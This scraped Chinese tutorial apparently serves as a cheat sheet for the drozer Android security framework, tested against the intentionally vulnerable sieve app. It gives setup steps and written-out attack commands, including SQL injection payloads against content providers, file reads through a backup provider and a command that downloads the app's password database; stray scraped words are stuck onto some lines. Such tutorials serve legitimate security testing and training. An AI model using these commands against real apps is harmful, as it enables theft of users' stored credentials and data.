![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
![](http://static.javashuo.com/static/loading.gif)
drozer基本命令
java
配置文件:
1.drozer_configgit
測試apk
1.sieve.apk
環境搭建:
1.下載drozer-installer-2.3.4.zip & drozer-agent-2.3.4.apk & sieve.apk
https://www.mwrinfosecurity.com/products/drozer/#downloadsgithub
2.安裝PC客戶端數據庫
drozer-installer-2.3.4.zip安全
3.安裝Android客戶端
adb install drozer-agent-2.3.4 .apkapp
4.安裝測試客戶端
adb install sieve.apktcp
5.建立drozer配置文件
C:\Users\Administrator\.drozer_config
[executables]
java = D:\Java\jdk1.6.0_45\bin\java.exe
javac = D:\Java\jdk1.6.0_45\bin\javac.exe
運行:
1.運行drozer-agent.apk
2.選擇embedded--enable
3.設置端口轉發
adb forward tcp:31415 tcp:31415
4.啓動drozer console
drozer.bat console connect
注意:
1.Java和drozer的安裝目錄不能帶空格
經常使用命令:
Package
1.關鍵字查找包名
命令 run app.pakcage.list -f <keyword>
示例 run app.package.list -f sieve
2.獲取應用基本信息
命令 run app.package.info -a <package name>
示例 run app.package.info -a com.mwr.example.sieve
3.肯定攻擊面
命令 run app.package.attacksurface <package name>
示例 run app.package.attacksurface com.mwr.example.sieve
Activity
4.獲取Activity信息
命令 run app.activity.info -a <package name>
示例 run app.activity.inof -a com.mwr.example.sieve
5.啓動Activity
命令 run app.activity.start --component <package name> <component name>
示例 run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.MainLoginActivity
Content Provider
6.獲取Content Provider信息
命令 run app.provider.info -a <package name>
示例 run app.provider.info -a com.mwr.example.sieve
7.獲取全部可訪問的Uri
命令 run scanner.provider.finduris -a <package name>
示例 run scanner.provider.finduris -a com.mwr.example.sieve
8.SQL注入
命令 run app.provider.query <uri> [--projection] [--selection]
示例 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
列出全部表 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
獲取單表(如Key)的數據 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
9.檢測SQL注入
命令 run scanner.provider.injection -a <package name>
示例 run scanner.provider.injection -a com.mwr.example.sieve
10.檢測目錄遍歷
命令 run scanner.provider.traversal -a <package name>
示例 run scanner.provider.traversal -a com.mwr.example.sieve
11.讀取文件系統下的文件
示例 run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
12.下載數據庫文件到本地
示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db ide